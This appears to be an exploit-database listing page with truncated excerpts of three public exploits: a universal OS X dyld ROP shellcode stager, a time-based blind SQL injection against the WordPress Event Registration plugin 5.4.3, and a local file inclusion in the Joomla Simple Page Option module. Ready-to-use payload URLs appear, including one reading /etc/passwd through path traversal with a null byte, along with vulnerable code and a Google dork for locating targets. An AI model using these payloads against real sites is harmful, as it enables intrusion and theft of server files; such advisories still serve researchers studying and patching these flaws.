; universal OSX dyld ROP shellcode ; tested on OS X 10.6.8 ; ; if you don’t want to compile, copy stage0 code from precompiled.txt ; and append your normal shellcode to it. ; ; usage: ; – put your ‘normal’ shellcode in x64_shellcode.asm ; – make ; – ./sc ; ; if you want …
# Exploit Title: WordPress Event Registration plugin < = 5.4.3 SQL Injection Vulnerability # Date: 2011-08-30 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/event-registration.5.43.zip # Version: 5.4.3 (tested) # Note: magic_quotes has to be turned off --- PoC --- http://www.site.com/wp-content/plugins/event-registration/event_registration_export.php?id=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)–%20 ————— Vulnerable code ————— $id= $_REQUEST[‘id’]; … $sql = “SELECT * …
# Exploit Title: Simple Page Option LFI # Google Dork: inurl:mod_spo # Date: 15/07/2011 # Author: SeguridadBlanca.Blogspot.com or SeguridadBlanca # Software Link: http://joomlacode.org/gf/download/frsrelease/11841/47776/mod_spo_1.5.16.zip # Version: 1.5.x # Tested on: Backtrack and Windows 7 Simple Page Option – LFI Vulnerable-Code: $s_lang =& JRequest::getVar(‘spo_site_lang’); (file_exists(dirname(__FILE__).DS.’languages’.DS.$s_lang.’.php’)) ? include(dirname(__FILE__).DS.’languages’.DS.$s_lang.’.php’) : include(dirname(__FILE__).DS.’languages’.DS.’english.php’); Vulnerable-Var: spo_site_lang= Expl0iting: http://www.xxx.com/home/modules/mod_spo/email_sender.php?also_email_to=sample@email.tst&spo_f_email[0]=sample@email.tst&spo_message=20&spo_msg_ftr=This%20contact%20message%20was%20generated%20using %20Simple%20Page%20Options%20Module%20from%20SITEURL.&spo_send_type=&spo_site_lang=../../../../../../../../../../etc/passwd% 00&spo_site_name=Alfredo%20Arauz&spo_url_type=1&spo_url2se Reparing?: Just …